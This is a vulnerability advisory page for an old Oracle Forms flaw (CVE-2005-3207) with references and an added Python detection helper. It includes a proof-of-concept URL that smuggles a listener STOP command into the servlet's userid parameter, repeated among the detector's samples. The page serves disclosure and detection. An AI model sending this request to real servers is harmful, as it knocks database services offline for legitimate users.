Oracle Forms Servlet TNS Listener Remote Denial of Service Vulnerability

Vulnerability ID 1109113 Vulnerability type Access validation error
Published 2005-10-07 Updated 2006-01-19
CVE ID CVE-2005-3207 CNNVD ID CNNVD-200510-103
Platform Multiple CVSS score 5.0
|Source
https://www.exploit-db.com/exploits/26336
https://cxsecurity.com/issue/WLB-2005100025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-103
|Details
Oracle Fusion Middleware is Oracle Corporation's business innovation platform for enterprise and cloud environments. Oracle Forms is one of its components, a toolset for developing web database applications. A vulnerability in Oracle Forms allows remote attackers to stop the TNS Listener service by issuing a specially crafted HTTP request, denying further database service to legitimate users.
|Exploit
source: http://www.securityfocus.com/bid/15039/info

Oracle Forms is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.

By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.

This issue was reported in Oracle Forms versions prior to July 2005.

This issue was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a separate BID.

http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES
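As the request above shows, the connect string after the "@" in the servlet's userid parameter is what carries the (COMMAND=STOP) that reaches the listener. The following detection helper is an added example written for this page (it is not Oracle's code and not part of the original advisory): it parses the userid value from request URLs, distinguishes a plain tnsnames alias from an inline TNS descriptor, and flags any descriptor that carries a COMMAND key, which a normal client connect string (SERVICE_NAME or SID) never does. The request URLs, hostnames and credentials in it are constructed samples; the alias character set and the "reject every inline descriptor at the reverse proxy" policy are assumptions of the example, and the vendor's July 2005 Critical Patch Update remains the actual fix.

```python
"""Detection helper: flag Oracle Forms servlet requests whose userid parameter
smuggles an inline TNS connect descriptor carrying a listener control command.
Added example for this advisory; not Oracle's code and not part of the original page."""
import re
from urllib.parse import parse_qs, urlsplit

# After the '@' a connect string is normally a tnsnames alias.
# The permitted character set here is an assumption of this example.
ALIAS_RE = re.compile(r"^[A-Za-z0-9_.$#-]+$")

# Constructed sample requests (hostnames and credentials are placeholders).
SAMPLE_REQUESTS = [
    "http://forms.example.test:8888/forms90/f90servlet?form=app.fmx&userid=appuser/pw@ORCL",
    "http://forms.example.test:8888/forms90/f90servlet?form=app.fmx&userid=appuser/pw@"
    "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=db.example.test)(PORT=1521))"
    "(CONNECT_DATA=(SERVICE_NAME=orcl)))",
    "http://forms.example.test:8888/forms90/f90servlet?form=app.fmx&userid=appuser/pw@"
    "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=db.example.test)(PORT=1521)))"
    "(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))",
]


def parse_tns(s, i=0):
    """Parse the nested (KEY=VALUE) list of a TNS descriptor starting at s[i].
    Returns (items, next_index); each item is (KEY, scalar string or nested items).
    Raises ValueError or IndexError on malformed input."""
    items = []
    while i < len(s) and s[i] == "(":
        eq = s.index("=", i)
        key = s[i + 1:eq].strip().upper()
        i = eq + 1
        if s[i] == "(":
            value, i = parse_tns(s, i)  # nested keyword list
        else:
            close = s.index(")", i)
            value = s[i:close].strip()  # scalar value
            i = close
        if s[i] != ")":
            raise ValueError("unbalanced descriptor")
        i += 1
        items.append((key, value))
    return items, i


def scalars(items):
    """Yield every (KEY, value) leaf of a parsed descriptor, depth first."""
    for key, value in items:
        if isinstance(value, list):
            yield from scalars(value)
        else:
            yield key, value


def classify_userid(userid):
    """Classify the connect-string part of a Forms userid value.

    kind is one of: no-connect-string, alias, inline-descriptor,
    listener-command (with the COMMAND value), malformed-descriptor.
    The split is on the first '@' (quoted passwords containing '@' are not handled).
    """
    _, at, connect = userid.partition("@")
    if not at:
        return {"kind": "no-connect-string"}
    if ALIAS_RE.match(connect):
        return {"kind": "alias"}
    try:
        items, end = parse_tns(connect)
        if end != len(connect) or not items:
            raise ValueError("trailing junk or empty descriptor")
    except (ValueError, IndexError):
        return {"kind": "malformed-descriptor"}
    # A client connect string names a SERVICE_NAME or SID; a COMMAND key is
    # the form a listener control request takes, so any occurrence is flagged.
    for key, value in scalars(items):
        if key == "COMMAND":
            return {"kind": "listener-command", "command": value.upper()}
    return {"kind": "inline-descriptor"}


def is_allowed(userid):
    """Assumed reverse-proxy policy in front of the servlet: accept only a tnsnames
    alias or no connect string at all. Rejecting every inline descriptor also blocks
    the STOP request from the advisory without having to enumerate listener verbs."""
    return classify_userid(userid)["kind"] in {"no-connect-string", "alias"}


def scan_requests(urls):
    """Run the classifier over request URLs (e.g. pulled from an access log)."""
    results = []
    for url in urls:
        params = parse_qs(urlsplit(url).query)
        for userid in params.get("userid", []):
            verdict = classify_userid(userid)
            verdict["url"] = url
            results.append(verdict)
    return results


if __name__ == "__main__":
    for verdict in scan_requests(SAMPLE_REQUESTS):
        print(verdict["kind"], verdict.get("command", ""), "allowed:", is_allowed(
            parse_qs(urlsplit(verdict["url"]).query)["userid"][0]))
```

Run against an exported access log, the listener-command verdicts are the lines worth alerting on; inline-descriptor verdicts are worth reviewing as well, since a Forms deployment that only ever uses tnsnames aliases has no legitimate reason to see a raw DESCRIPTION in a query string.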
|References

Source: MISC
Link: http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html
Source: XF
Name: oracle-forms-tns-dos(22543)
Link: http://xforce.iss.net/xforce/xfdb/22543
Source: BID
Name: 15039
Link: http://www.securityfocus.com/bid/15039
Source: MISC
Link: http://www.red-database-security.com/advisory/oracle_forms_shutdown.html
Source: SECUNIA
Name: 15991
Link: http://secunia.com/advisories/15991/
Source: BUGTRAQ
Name: 20051007 Shutdown TNS Listener via Oracle Forms Servlet
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112870645720399&w=2
Source: FULLDISC
Name: 20051007 Shutdown TNS Listener via Oracle Forms Servlet
Link: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0175.html
Source: SREASON
Name: 65
Link: http://securityreason.com/securityalert/65